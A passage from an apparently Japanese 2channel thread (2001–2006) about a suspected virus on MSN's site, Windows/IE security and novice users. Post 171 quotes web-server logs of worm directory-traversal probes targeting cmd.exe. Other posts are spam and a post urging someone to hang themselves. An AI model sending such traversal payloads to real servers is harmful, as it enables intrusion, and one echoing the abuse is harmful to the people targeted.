ってのが主な理由でしょ。

144 ：名無しさん＠お腹いっぱい。：01/09/20 10:21
始めっから入ってるからだろう，ソフトがどうかなんて考えて
無い奴が多いと思うが

145 ： ：01/09/20 10:35
すぐに穴空いたり、変なスクリプトやウイルス出てきて
飽きないよ。WIN。
パッチ当てて安心するだけじゃなく、そのバグ突いた不
正スクリプト探し当てるのも楽しいし。
ただ、そのバグ発見した本人が公開前にMSに警告したに
も関わらず、パッチ出なくて業を煮やして公開に踏み切
ってるのは企業態度として頂けない。

146 ：名無しさん＠お腹いっぱい。：01/09/20 10:35
>>142
excel と word を使ってるだけだろ，ほとんどの奴は

147 ：名無しさん＠お腹いっぱい。：01/09/20 10:37
いままでにIEから重要なエラーとか言うので、その事を管理側に教えた事ある人います？
これでこのエラーでたの2度目なんだけど、送信しなかった。

148 ：名無しさん＠お腹いっぱい。：01/09/20 10:41
Outlookのプレビュー機能だけは即刻廃止させた方がいいだろうな

149 ：名無しさん＠お腹いっぱい。：01/09/20 11:21
>>142
UNIXとかならそういう主張も説得力あるけど、
WINDOWSは知識持ってる奴だけが使う物じゃないからね・・・
XP祭りなんかやってる場合かM＄

150 ：名無しさん＠お腹いっぱい。：01/09/20 17:10
>>142
いま「ＩＴ講習」とかいって、６０歳過ぎたじーちゃんばーちゃん
だってＯＵＴＬＯＯＫやＩＥ使ってネットしているよ。っていうか、
それ以外の方法を知らない。
アップグレードの仕方は教えているのかな。心配。

151 ：名無しさん＠お腹いっぱい。：01/09/20 20:05
>>150
アップグレードなんか教えてないね。
使うだけでせーいっぱいなのに、どーやって教えるんだ？
使えればいいのであって、それ以上のことは学ぼうとしないよ。
ジジババだけじゃなく、たいていのWinユーザーがそうだと思うよ。
痛い目に会わないとわからないんだよ。
感染しててもわからないに、１００００００ペリカ。

おれも１０年以上の昔にブートセクターウィルスにやられてから、いろいろと学んだよ。

「転んでも泣かない！」

152 ：名無しさん＠お腹いっぱい。：01/09/20 21:03
>>150
そういえばPCショップで老夫婦がシンクパッド持ってきて
店員に｢ああ、これなら再インストールで直りますよ｣と
あっさり言われて｢さい･･･なんとか？｣とつぶやいて
立ち尽くしていたのを思い出す。

インターネットボタンとかテレビ録画だとかいかにも簡単
そうに宣伝しておいてリカバリーになったとたんDOS画面
だもんな。そんなんだったら｢バックアップボタン｣とか
｢再インストール｣ボタンでも付けた方がユーザー喜ぶよね。

153 ：名無しさん＠お腹いっぱい。：01/09/20 21:29
IEの方から「重要なエラー」とかいうダイアログが出たんですけど、なに？
出た人いますか？

154 ：　：01/09/20 21:42
>>153
出た出た。
それ、送信しないほうがいい。
ＭＳに情報もっていかれる。

155 ：名無しさん＠お腹いっぱい。：01/09/20 21:56
>>154さん
送信しちゃったよ。。。
どうなるのかな？
俺のPCなんてろくなものは言ってないのに。。。

156 ：初心者な人：01/09/21 00:17
申し訳ありません、ここで言うＭＳとは何でしょか？

157 ：ahya：01/09/21 00:23
>>156ネタだよな？
しかしWINは大変だな。LINUX厨房の俺には関係ないが

158 ：156です：01/09/21 00:29
すみません、正気なんです。あわわわわぁ・・・

159 ：名無しさん＠お腹いっぱい。：01/09/21 00:57
>>156
MS=M$

160 ：野次馬バカ：01/09/21 01:04
確かおとといの夜だったかな・・・？
ここで『MSNがウィルスばら撒いてる』っての見て、
好奇心で見に行ってしまった・・・バカだ。
幸いにも『ページが表示できません』で繋がらなか
ったみたいだが・・・今考えるとぞっとする。

161 ：156です：01/09/21 01:09
>>159
Ｍ＄・・・・・

・・・・・・・すみません、厨房です。
初心者板逝って来ます。

162 ：野次馬で感染したら自業自得か？：01/09/21 01:09
漏れもそう。
ニュースサイトで知って、ホントかよ・・・
と思って２ちゃんで知ったアドレスにレッツアクセス！

昨日から大惨事。
自業自得か・・・・

163 ：ふーん：01/09/21 01:10
>>161
マイクロソフト以外に何があるってんだ？

164 ：名無しさん＠お腹いっぱい。：01/09/21 01:13
http://210.135.201.16/

165 ：名無しさん＠お腹いっぱい。：01/09/21 01:13
>>156
某シュレッダー大手

166 ：156です：01/09/21 01:18
>>163
マイクロソフト・・・うわぁ、アホだ俺・・・。
ご迷惑おかけしました、やっぱ逝ってきます。

167 ：名無しさん＠お腹いっぱい。：01/09/21 10:25
騙されてるよ、モビールスーツに決まってるジャン
みんな初心者をもてあそんじゃ可哀相だよ。

168 ：名無しさん＠お腹いっぱい。：01/09/21 13:25
いやいや。
msとは、マンコ・セクースのことだよ。

169 ：-：01/09/21 13:29
モロ、無修正画像サイト発見！

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

170 ：名無しさん＠お腹いっぱい。：01/09/21 13:48
nikuyoku893@hotmail.com

171 ：　　：01/09/21 22:57
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:38 2001 error File does not exist: /home/httpd/htdocs/c/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:40 2001 error File does not exist: /home/httpd/htdocs/d/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:42 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:44 2001 error File does not exist: /home/httpd/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:47 2001 error File does not exist: /home/httpd/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:52 2001 error File does not exist: /home/httpd/htdocs/msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:54 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾁ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:58 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾀｯ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:01 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾁ・./winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:10 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:16 2001 error File does not exist: /home/httpd/htdocs/scripts/..%2f../winnt/system32/cmd.exe

172 ：>152：01/09/21 23:09
きまりきったアプリしか使わなくてアップデートもさほど必要じゃないってユーザ層に
システムやアプリはCD-ROM みたいな書きこみ不可能な媒体で動かす
マシン発売すりゃいいんだよ。
昔のワープロ専用機みたいに。
クラッシュの心配はほぼないし、ウイルス汚染もかなり減るだろ。
取り扱い簡単になるはず。

173 ：>172：01/09/21 23:54
昔、それに似たようなパソコンが売られてたような、、
どうなんたんだろう？

確か勝手にパソコンがアップデートしてくれるマシン。
ユーザーは何もしなくてよかったと思う

174 ：名無しさん＠お腹いっぱい。：01/09/22 00:00
トレンドマイクロのサイトに行って
オンラインで探したところ（無料）
７つの感染ファイルがみつかりました。
MSNのホームページから勝手にダウンロードされた
圧縮ファイルのようです。
削除したけど・・・もう大丈夫かな？

175 ：152：01/09/22 09:42
>>172
あはは！そりゃ良いや。メール、ブラウザ、オフィス、年賀状
位しか使ってないんだからな。

176 ：名無しさん＠お腹いっぱい。：01/09/22 10:32
かんめーないけど
まきはらとさいとーがいんたいだってね

http://www.sponichi.co.jp/baseball/kiji/2001/09/22/01.html

177 ：回線さえ速けりゃ：01/09/22 12:03
PCにOS未搭載する。
BIOSがネット機能持て。boot時に選択メニュー(もちろんお気に入りのOS群)
がでる。ネットからOSを見つけてbootする。メーカーのServerでもいいし、その辺のユーザーPCの読込済みのでもいいじゃん。
OS部分は共有化だな。NapsterやWINMXみたいにさ。ついでにアプリも共有しちゃえ。
もはやHDDは自前のデータだけになり、寂しい俺としては40MBディスク復活希望。

178 ：回線さえ速けりゃ２：01/09/22 12:04
ISPが10メガ用意しているので、お前はディスクも要らぬと 後ろから声がした。

179 ：名無しさん＠お腹いっぱい。：01/09/22 12:23
ようするにロムブート。

180 ：名無しさん＠明日があるさ：01/09/22 12:37
意訳してロンブー

181 ：名無しさん＠お腹いっぱい。：01/09/22 13:47
>>180
パソコンのネットワークカードに御茶目なプログラムが
乗ってて、電源入れたときにディスクが使えない　OR
使わないとしよう。　そうすっと、
「俺んち何もねーからアドレスくれYO!｣とか、
「次何したらいーかわかんねーからおせーて｣とか、
とにかく教えてクンモードになっちゃうのが”ろむぶー”
親切などぜう^H^H^H鯖が出てきてこんにちは、ぼっちゃん「あれせい。
これやる」と死ぬまで面倒見てやるってパターン。　うんDOZEだと、
Cドライブまでサーバから共有フォルダになってる
パターンだな。　終わり。

182 ：>：01/09/22 14:20
家電とか車なみに普及し、
ユーザがそういう範囲に広がるんなら
OSやアプリが書き換え不可能な媒体での運用
というマシンをメーカは真剣に考えるべきだろ。

家電や車をコントロールしてるソフトウエア
EPROMその他を媒体としている。
　悪意のある部外者が悪意をもったさわり方をしたり
　未熟なユーザが誤操作をしても
媒体に書いてある内容が悪い改変を受けることは
まあないでしょう。

183 ：ブラックリスト：01/09/22 14:31
騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com
★裏社会の会議室が只今、会議中！！！


☆女性事務スタッフ募集中！高収入確実！！！

184 ：　 ：01/09/22 15:26
＞＞騙された・捨てられた・弄ばれた・相手に誠意がない・
MSの事・？

185 ：名無しさん＠お腹いっぱい。：01/12/28 15:01
さまざまな人がつかいますね

186 ：名無しさん＠お腹いっぱい。：01/12/29 00:32
saGe

187 ：名無しさん＠お腹いっぱい。：02/02/17 00:07
程よい沈み具合

188 ：名無しさん＠お腹いっぱい。：02/08/27 20:25
>>187
・・・沈みすぎだろう。

189 ：名無しさん：03/01/02 19:15
　　　　　　　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣＼
Λ＿Λ　　|　君さぁ　こんなスレッド立てるから　　　　　　　　 　|
（　´∀｀）＜　厨房って言われちゃうんだよ　　　　　　　　　 　 　|
（ ΛΛ つ ＞―――――――――――――――――――‐＜
　( ﾟДﾟ) ＜　おまえのことを必要としてる奴なんて　　 　　　　　 |
　/つつ　　|　いないんだからさっさと回線切って首吊れ　　　 　|
　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_／

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)


190 ：山崎渉：03/01/15 15:50
（＾＾）

191 ：山崎渉：03/04/17 12:32
（＾＾）

192 ：山崎渉：03/04/20 06:05
　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

193 ：山崎渉：03/05/28 17:17
　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

194 ：山崎 渉：03/07/15 11:13

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

195 ：ぼるじょあ ◆yBEncckFOU ：03/08/02 05:17
　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

196 ：山崎 渉：03/08/15 23:04
　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

197 ：名無しさん＠お腹いっぱい。：03/08/25 16:12
このファイルはウイルスに感染しています。次のオプションから選択してください。
感染した添付ファイルからウイルスを駆除するため、MSN 有料サービスにサインアップする。 (推奨).
注意 : 駆除できないウイルスおよびその亜種が存在する可能性があります。
ウイルスに感染したファイルをダウンロードする。
感染したウイルスが原因でコンピュータが損傷を受けた場合、Hotmail では責任を負いかねます。


198 ：名無しさん＠お腹いっぱい。：03/08/25 16:30
２ちゃんのカウンター崩壊！！
このスレのNo２６のカキコはどこへ逝ったっ！
http://kyusyu.machibbs.com/bbs/read.pl?BBS=kyusyu&KEY=1053838955&LAST=50

199 ：名無しさん＠お腹いっぱい。：03/11/19 01:30
age

200 ：名無しさん＠お腹いっぱい。：04/06/01 01:18
test

201 ：名無しさん＠お腹いっぱい。：04/12/01 03:10:30
自動的にサインインにチェック入れてなかったのに勝手にサインインされるんですが・・。
自分しかさわれないPCなのに。。。

202 ：ウイルス：05/01/23 14:27:29
やばい、変なとこ押したら本体がすごい音出した

203 ：ウイルス：05/01/23 14:28:00
やばい、変なとこ押したら本体がすごい音出した

204 ：名無しさん＠お腹いっぱい。：05/01/23 22:20:13
;-:=:=ー- 　　　　　 ー=;-;-;-;, , _　ヽヽ
　　　　　　,; ';";; ;;`-' '""　　　　　 　 ,;＝"ヽ_ ; ; ;:丶
　　　,,_　　!;_<"　　　　　　＿o从o＿　 ＋　　/; /　　,,.;- ,　））
((　(; ; ";''-ヽ 丶,,　+　／''''　　　 ''''' ＼　　+／／-;';";" ／
　 , -"'' -';;";;' ー:ニ;r'（●）,　　　､（●）ヽ／／,,-;''" ,,-"-=-,
　 ' -";;;"' -; ,二',-:（;;; ;;; ,,ﾉ(､_, )ヽ､,,ヽ;; ;）;" ',, - 二-- '' "_ノ
　　　,ー"';--;;,;;_,二| ;; ;; ｀-=ﾆ=- ';;);: ;;; ;| ""二"--,-二""
　　　 "'' '-;- ;;:;__ ,,,ヽ;;; ; ;:｀ﾆﾆ´:::; ;;; ;; ;丿'""二二;---"
　　　　　　ヾヽ,　,,- ="'--==,;;__;;,==--',' '''=二,,_,/i


205 ：名無しさん＠お腹いっぱい。：05/03/07 08:21:21
今イギリスでBropiaの亜種が猛威を振るってる（MSN Messenger媒介感染）
　ﾆﾎﾟｰﾝ上陸はすぐだろうからもまいら用心汁

206 ：205：05/03/07 08:31:18
>>202
ｿﾚﾀﾞ! ｳｲﾙｽﾊｹｰﾝ!!! <Bropia亜種

207 ：名無しさん＠お腹いっぱい。：2005/05/28(土) 08:40:42
まだまだ無料で使える部屋があります。
とりあえず　http://chat.msn.com/chatroom.msnw?rm=JudyGreenroom&pgmarket=en-ca
へどうぞ
詳しい説明をします。

208 ：名無しさん＠お腹いっぱい。：2005/10/30(日) 15:20:42
ホシュ

209 ：前山要平 ◆u24mltiAcY ：2005/11/23(水) 17:15:31
セフレ募集です＞＜

210 ：名無しさん＠お腹いっぱい。：2006/05/03(水) 01:05:44
保守

211 ：名無しさん＠お腹いっぱい。：2006/06/03(土) 00:08:23
>>1
1 名前：名無しさん＠お腹いっぱい。[] 投稿日：01/09/19(水) 00:11
ニュー速板では、あきらかにウイルスだと言う人も
出てますが、どうなんでしょう？

関連スレ
MSNにウィルス添付？
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776


212 ：名無しさん＠お腹いっぱい。：2006/09/28(木) 23:37:39
記念真紀子

【負け組】楽天アフィリエイト Part 27【限定】
細木数子の占いの当たりはずれを検証する